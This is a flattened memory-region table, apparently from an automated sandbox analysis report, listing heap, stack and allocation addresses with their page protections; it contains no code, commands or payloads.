||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
1F1B4762000
|
trusted library allocation
|
page read and write
|
||
|
2D37000
|
heap
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
29EDFA23000
|
heap
|
page read and write
|
||
|
C8006FE000
|
stack
|
page read and write
|
||
|
7CB000
|
heap
|
page read and write
|
||
|
489A57E000
|
stack
|
page read and write
|
||
|
299F000
|
stack
|
page read and write
|
||
|
2CEE000
|
stack
|
page read and write
|
||
|
7F020000
|
direct allocation
|
page read and write
|
||
|
286B000
|
heap
|
page read and write
|
||
|
7EFB0000
|
direct allocation
|
page read and write
|
||
|
27B094E0000
|
heap
|
page read and write
|
||
|
355F000
|
heap
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
2916000
|
direct allocation
|
page read and write
|
||
|
29B5000
|
stack
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
7F660000
|
direct allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
355E000
|
heap
|
page read and write
|
||
|
56DBFE000
|
stack
|
page read and write
|
||
|
2DB4000
|
heap
|
page read and write
|
||
|
20B19893000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7F660000
|
direct allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
26E4EE60000
|
heap
|
page read and write
|
||
|
48AE000
|
stack
|
page read and write
|
||
|
20B19627000
|
heap
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
7FF6C36C4000
|
unkown
|
page read and write
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
7FF7E1A64000
|
unkown
|
page write copy
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
26F69A27000
|
heap
|
page read and write
|
||
|
7EE90000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A68000
|
unkown
|
page read and write
|
||
|
21A447D0000
|
heap
|
page read and write
|
||
|
1E8CB000
|
stack
|
page read and write
|
||
|
97000
|
stack
|
page read and write
|
||
|
7EFF0000
|
direct allocation
|
page read and write
|
||
|
2D24000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
23FE08B8000
|
heap
|
page read and write
|
||
|
246EE625000
|
heap
|
page read and write
|
||
|
2490000
|
heap
|
page read and write
|
||
|
20E1C040000
|
heap
|
page read and write
|
||
|
CAF933C000
|
stack
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
9B5AAAB000
|
stack
|
page read and write
|
||
|
15271799000
|
heap
|
page read and write
|
||
|
23D1000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
1F1CAD60000
|
heap
|
page execute and read and write
|
||
|
15DA1000
|
heap
|
page read and write
|
||
|
7F5A0000
|
direct allocation
|
page read and write
|
||
|
15A62000
|
heap
|
page read and write
|
||
|
20B1963E000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
FCD6CFC000
|
stack
|
page read and write
|
||
|
27B09754000
|
heap
|
page read and write
|
||
|
1F1C2BB2000
|
trusted library allocation
|
page read and write
|
||
|
1F400DC8000
|
heap
|
page read and write
|
||
|
478000
|
direct allocation
|
page execute and read and write
|
||
|
7EE50000
|
direct allocation
|
page read and write
|
||
|
287E000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
15700000
|
heap
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
35BE000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
155DE000
|
stack
|
page read and write
|
||
|
15720000
|
heap
|
page read and write
|
||
|
7FB000
|
heap
|
page read and write
|
||
|
27B09511000
|
heap
|
page read and write
|
||
|
20B1963F000
|
heap
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
7FF7E1A75000
|
unkown
|
page write copy
|
||
|
4CB000
|
unkown
|
page read and write
|
||
|
23FE0890000
|
heap
|
page read and write
|
||
|
153DF000
|
stack
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
7F5E0000
|
direct allocation
|
page read and write
|
||
|
1E970000
|
heap
|
page read and write
|
||
|
56DC7B000
|
stack
|
page read and write
|
||
|
245E000
|
stack
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
20B19940000
|
heap
|
page read and write
|
||
|
2E64000
|
heap
|
page read and write
|
||
|
2E4F000
|
heap
|
page read and write
|
||
|
2991000
|
direct allocation
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
7F1000
|
heap
|
page read and write
|
||
|
1CF2EFE000
|
stack
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
23FE0990000
|
heap
|
page read and write
|
||
|
27B09518000
|
heap
|
page read and write
|
||
|
2978000
|
direct allocation
|
page read and write
|
||
|
154DF000
|
stack
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F1CB140000
|
heap
|
page read and write
|
||
|
27B09519000
|
heap
|
page read and write
|
||
|
27B096B0000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
1CD34620000
|
heap
|
page read and write
|
||
|
2871000
|
heap
|
page read and write
|
||
|
1CD34720000
|
heap
|
page read and write
|
||
|
B2072FD000
|
stack
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
1F1B2B41000
|
trusted library allocation
|
page read and write
|
||
|
3FFD000
|
direct allocation
|
page read and write
|
||
|
2B0A000
|
stack
|
page read and write
|
||
|
1C132CF0000
|
heap
|
page read and write
|
||
|
2AF988A0000
|
heap
|
page read and write
|
||
|
20B19638000
|
heap
|
page read and write
|
||
|
294D000
|
direct allocation
|
page read and write
|
||
|
7F5000
|
heap
|
page read and write
|
||
|
152718D0000
|
heap
|
page read and write
|
||
|
2368000
|
direct allocation
|
page read and write
|
||
|
15C70000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
1E94F000
|
stack
|
page read and write
|
||
|
1C130E30000
|
heap
|
page read and write
|
||
|
1F1B0E95000
|
heap
|
page read and write
|
||
|
FE0AAFC000
|
stack
|
page read and write
|
||
|
2C0F000
|
stack
|
page read and write
|
||
|
1F1B43BF000
|
trusted library allocation
|
page read and write
|
||
|
2691000
|
direct allocation
|
page read and write
|
||
|
271E31C0000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
7F6E0000
|
direct allocation
|
page read and write
|
||
|
23C3000
|
direct allocation
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
1F1B3FA5000
|
trusted library allocation
|
page read and write
|
||
|
15708000
|
heap
|
page read and write
|
||
|
1F400D98000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2AF988C8000
|
heap
|
page read and write
|
||
|
2A9A000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
2378000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7EEFF000
|
direct allocation
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
2A7A000
|
stack
|
page read and write
|
||
|
20B1962B000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
7FF738F51000
|
unkown
|
page execute read
|
||
|
26F6B930000
|
trusted library allocation
|
page read and write
|
||
|
271E33B0000
|
heap
|
page read and write
|
||
|
7F7EF000
|
direct allocation
|
page read and write
|
||
|
26F699FA000
|
heap
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
2AFF000
|
stack
|
page read and write
|
||
|
267C000
|
direct allocation
|
page read and write
|
||
|
21A42B80000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
2E52000
|
heap
|
page read and write
|
||
|
2E07000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
8A9000
|
heap
|
page read and write
|
||
|
7FF7E1A64000
|
unkown
|
page write copy
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
5BE30FC000
|
stack
|
page read and write
|
||
|
7F45F000
|
direct allocation
|
page read and write
|
||
|
7ED50000
|
direct allocation
|
page read and write
|
||
|
26F69A27000
|
heap
|
page read and write
|
||
|
27B09518000
|
heap
|
page read and write
|
||
|
26E4EAA0000
|
heap
|
page read and write
|
||
|
7EDDF000
|
direct allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF7E1A5A000
|
unkown
|
page write copy
|
||
|
298A000
|
direct allocation
|
page read and write
|
||
|
3599000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
271E31A0000
|
heap
|
page read and write
|
||
|
1C130E80000
|
heap
|
page read and write
|
||
|
FE0ACFF000
|
stack
|
page read and write
|
||
|
14C570A0000
|
heap
|
page read and write
|
||
|
26570160000
|
heap
|
page read and write
|
||
|
14C571C0000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
20B1965A000
|
heap
|
page read and write
|
||
|
7FF622766000
|
unkown
|
page read and write
|
||
|
20E1BFA4000
|
heap
|
page read and write
|
||
|
1CD34820000
|
heap
|
page read and write
|
||
|
15271778000
|
heap
|
page read and write
|
||
|
44E0000
|
heap
|
page read and write
|
||
|
20D695D0000
|
heap
|
page readonly
|
||
|
486C000
|
stack
|
page read and write
|
||
|
7FF622767000
|
unkown
|
page readonly
|
||
|
1F1B441A000
|
trusted library allocation
|
page read and write
|
||
|
26F699F6000
|
heap
|
page read and write
|
||
|
35BE000
|
heap
|
page read and write
|
||
|
2D0F000
|
stack
|
page read and write
|
||
|
7EFA0000
|
direct allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
1F1B0DA0000
|
heap
|
page read and write
|
||
|
56D1DE000
|
stack
|
page read and write
|
||
|
20B1B620000
|
trusted library allocation
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
3520000
|
heap
|
page read and write
|
||
|
290F000
|
direct allocation
|
page read and write
|
||
|
C8008FE000
|
stack
|
page read and write
|
||
|
4DFD000
|
stack
|
page read and write
|
||
|
26E4EBA0000
|
heap
|
page read and write
|
||
|
7F510000
|
direct allocation
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
2844000
|
heap
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
26F6B3F3000
|
heap
|
page read and write
|
||
|
2A01000
|
direct allocation
|
page read and write
|
||
|
2CBF000
|
stack
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
56D9F9000
|
stack
|
page read and write
|
||
|
235F55C0000
|
heap
|
page read and write
|
||
|
474000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
2946000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A6D000
|
unkown
|
page readonly
|
||
|
CAF96FF000
|
stack
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
298A000
|
direct allocation
|
page read and write
|
||
|
56DB7E000
|
stack
|
page read and write
|
||
|
2650000
|
direct allocation
|
page read and write
|
||
|
1F400D9C000
|
heap
|
page read and write
|
||
|
272E000
|
stack
|
page read and write
|
||
|
235A000
|
direct allocation
|
page read and write
|
||
|
235F5787000
|
heap
|
page read and write
|
||
|
B1DDAFB000
|
stack
|
page read and write
|
||
|
1CF2CFC000
|
stack
|
page read and write
|
||
|
152718D5000
|
heap
|
page read and write
|
||
|
1F400DC8000
|
heap
|
page read and write
|
||
|
2CDF000
|
stack
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
1F1CB171000
|
heap
|
page read and write
|
||
|
E54E50E000
|
stack
|
page read and write
|
||
|
82B000
|
heap
|
page read and write
|
||
|
56D5FE000
|
stack
|
page read and write
|
||
|
8A5000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
45F000
|
unkown
|
page read and write
|
||
|
295C000
|
direct allocation
|
page read and write
|
||
|
56E6CC000
|
stack
|
page read and write
|
||
|
7FD70000
|
direct allocation
|
page read and write
|
||
|
1584E000
|
stack
|
page read and write
|
||
|
23B4000
|
direct allocation
|
page read and write
|
||
|
20B1965D000
|
heap
|
page read and write
|
||
|
248FE194000
|
heap
|
page read and write
|
||
|
246EE600000
|
heap
|
page read and write
|
||
|
1E840000
|
heap
|
page read and write
|
||
|
7FE49000
|
direct allocation
|
page read and write
|
||
|
9B5AFFA000
|
stack
|
page read and write
|
||
|
7F070000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
26F699E0000
|
heap
|
page read and write
|
||
|
268A000
|
direct allocation
|
page read and write
|
||
|
7CE000
|
heap
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
248FE170000
|
heap
|
page read and write
|
||
|
1F1B26D0000
|
heap
|
page readonly
|
||
|
E54E58E000
|
stack
|
page read and write
|
||
|
74F000
|
stack
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
7EED0000
|
direct allocation
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
21A447EC000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
56D47E000
|
stack
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1C130E60000
|
heap
|
page read and write
|
||
|
F6433FF000
|
unkown
|
page read and write
|
||
|
6490000
|
trusted library allocation
|
page read and write
|
||
|
1D040000
|
trusted library allocation
|
page read and write
|
||
|
1570D000
|
stack
|
page read and write
|
||
|
7EFFF000
|
direct allocation
|
page read and write
|
||
|
4850000
|
heap
|
page read and write
|
||
|
29FB000
|
stack
|
page read and write
|
||
|
C8007FF000
|
stack
|
page read and write
|
||
|
20B19659000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
26570083000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
1F1CAE10000
|
heap
|
page read and write
|
||
|
7F670000
|
direct allocation
|
page read and write
|
||
|
20B1962B000
|
heap
|
page read and write
|
||
|
7FF6C36C4000
|
unkown
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
CAF97FF000
|
stack
|
page read and write
|
||
|
1F400DCE000
|
heap
|
page read and write
|
||
|
1E40E000
|
stack
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
1D6D0E30000
|
heap
|
page read and write
|
||
|
160F0000
|
direct allocation
|
page execute and read and write
|
||
|
7F020000
|
direct allocation
|
page read and write
|
||
|
23FE07B0000
|
heap
|
page read and write
|
||
|
88C000
|
heap
|
page read and write
|
||
|
15FF5000
|
heap
|
page read and write
|
||
|
1CD34840000
|
heap
|
page read and write
|
||
|
15A29BE000
|
stack
|
page read and write
|
||
|
2D9E000
|
stack
|
page read and write
|
||
|
26AC000
|
stack
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
7F200000
|
direct allocation
|
page read and write
|
||
|
1F1C2BBE000
|
trusted library allocation
|
page read and write
|
||
|
284F000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
1F1CAD67000
|
heap
|
page execute and read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
1D6D0EC0000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
1E88C000
|
stack
|
page read and write
|
||
|
16187000
|
heap
|
page read and write
|
||
|
2B7A000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
26DC000
|
stack
|
page read and write
|
||
|
26570044000
|
heap
|
page read and write
|
||
|
286F000
|
unkown
|
page read and write
|
||
|
26F69A2B000
|
heap
|
page read and write
|
||
|
4FB4000
|
heap
|
page read and write
|
||
|
1F400DA8000
|
heap
|
page read and write
|
||
|
15271796000
|
heap
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
248FE360000
|
heap
|
page read and write
|
||
|
295E000
|
stack
|
page read and write
|
||
|
1F1B469C000
|
trusted library allocation
|
page read and write
|
||
|
41958FF000
|
stack
|
page read and write
|
||
|
1E980000
|
heap
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
7FF738F51000
|
unkown
|
page execute read
|
||
|
21A449C0000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7AE000
|
heap
|
page read and write
|
||
|
3528000
|
heap
|
page read and write
|
||
|
4F2B000
|
stack
|
page read and write
|
||
|
26E4ED20000
|
heap
|
page read and write
|
||
|
26F69A2D000
|
heap
|
page read and write
|
||
|
26F6C130000
|
heap
|
page read and write
|
||
|
7CE000
|
heap
|
page read and write
|
||
|
7F070000
|
direct allocation
|
page read and write
|
||
|
1F402683000
|
heap
|
page read and write
|
||
|
2B1E000
|
unkown
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
26F69A0C000
|
heap
|
page read and write
|
||
|
1F1CAD70000
|
heap
|
page read and write
|
||
|
7FBA0000
|
direct allocation
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
A94D53E000
|
stack
|
page read and write
|
||
|
7EBE0000
|
direct allocation
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
1E950000
|
heap
|
page read and write
|
||
|
26F699E7000
|
heap
|
page read and write
|
||
|
5BE31FE000
|
stack
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
7C86ACC000
|
stack
|
page read and write
|
||
|
84C000
|
heap
|
page read and write
|
||
|
16320000
|
direct allocation
|
page execute and read and write
|
||
|
20D69626000
|
heap
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
B20727C000
|
stack
|
page read and write
|
||
|
626000
|
heap
|
page read and write
|
||
|
60E000
|
stack
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
2382000
|
direct allocation
|
page read and write
|
||
|
351B000
|
stack
|
page read and write
|
||
|
613C0000
|
unkown
|
page readonly
|
||
|
1534F000
|
stack
|
page read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
2D24000
|
heap
|
page read and write
|
||
|
246EE60C000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1F1B26E0000
|
trusted library allocation
|
page read and write
|
||
|
1F1CB17A000
|
heap
|
page read and write
|
||
|
7FF7E1A78000
|
unkown
|
page readonly
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
1F400D30000
|
heap
|
page read and write
|
||
|
7AA000
|
heap
|
page read and write
|
||
|
77CB7EC000
|
stack
|
page read and write
|
||
|
21A428C0000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
27B09750000
|
heap
|
page read and write
|
||
|
408C000
|
direct allocation
|
page read and write
|
||
|
7F660000
|
direct allocation
|
page read and write
|
||
|
613CE000
|
unkown
|
page readonly
|
||
|
15721000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
56D879000
|
stack
|
page read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
4430000
|
heap
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
7FF6227B9000
|
unkown
|
page readonly
|
||
|
877000
|
heap
|
page read and write
|
||
|
22F0000
|
direct allocation
|
page execute and read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
20E1BFA0000
|
heap
|
page read and write
|
||
|
235F56B4000
|
heap
|
page read and write
|
||
|
29F3000
|
direct allocation
|
page read and write
|
||
|
56D193000
|
stack
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
CCEE6FF000
|
stack
|
page read and write
|
||
|
2CBE000
|
stack
|
page read and write
|
||
|
2250000
|
direct allocation
|
page read and write
|
||
|
1C130ED9000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
880000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
23D8000
|
direct allocation
|
page read and write
|
||
|
26F699AC000
|
heap
|
page read and write
|
||
|
E54E87F000
|
stack
|
page read and write
|
||
|
7F070000
|
direct allocation
|
page read and write
|
||
|
613C1000
|
unkown
|
page execute read
|
||
|
23BC000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9CB000
|
trusted library allocation
|
page read and write
|
||
|
4DC0000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
271E31EF000
|
heap
|
page read and write
|
||
|
23AD000
|
direct allocation
|
page read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
1F400D87000
|
heap
|
page read and write
|
||
|
23FE09D5000
|
heap
|
page read and write
|
||
|
2228000
|
direct allocation
|
page read and write
|
||
|
21A42870000
|
heap
|
page read and write
|
||
|
26570020000
|
heap
|
page read and write
|
||
|
7FF62275D000
|
unkown
|
page readonly
|
||
|
FCD6EFE000
|
stack
|
page read and write
|
||
|
2698000
|
direct allocation
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
20B19639000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
3FA0000
|
direct allocation
|
page readonly
|
||
|
2D08000
|
heap
|
page read and write
|
||
|
2656FF40000
|
heap
|
page read and write
|
||
|
7EFA0000
|
direct allocation
|
page read and write
|
||
|
160F0000
|
trusted library allocation
|
page read and write
|
||
|
2D62000
|
heap
|
page read and write
|
||
|
35BE000
|
heap
|
page read and write
|
||
|
7FF6C36CC000
|
unkown
|
page write copy
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
4CF000
|
unkown
|
page write copy
|
||
|
20B197F0000
|
heap
|
page read and write
|
||
|
613CA000
|
unkown
|
page read and write
|
||
|
1F1B2763000
|
trusted library allocation
|
page read and write
|
||
|
2740000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
7FF6C36C4000
|
unkown
|
page read and write
|
||
|
14C57180000
|
heap
|
page read and write
|
||
|
2D5F000
|
stack
|
page read and write
|
||
|
7ED000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
7FF6C36B9000
|
unkown
|
page read and write
|
||
|
235F576C000
|
heap
|
page read and write
|
||
|
7FF6C36CD000
|
unkown
|
page readonly
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
1D6D0EC7000
|
heap
|
page read and write
|
||
|
15271650000
|
heap
|
page read and write
|
||
|
7ECA0000
|
direct allocation
|
page read and write
|
There are 1336 hidden memdumps, click here to show them.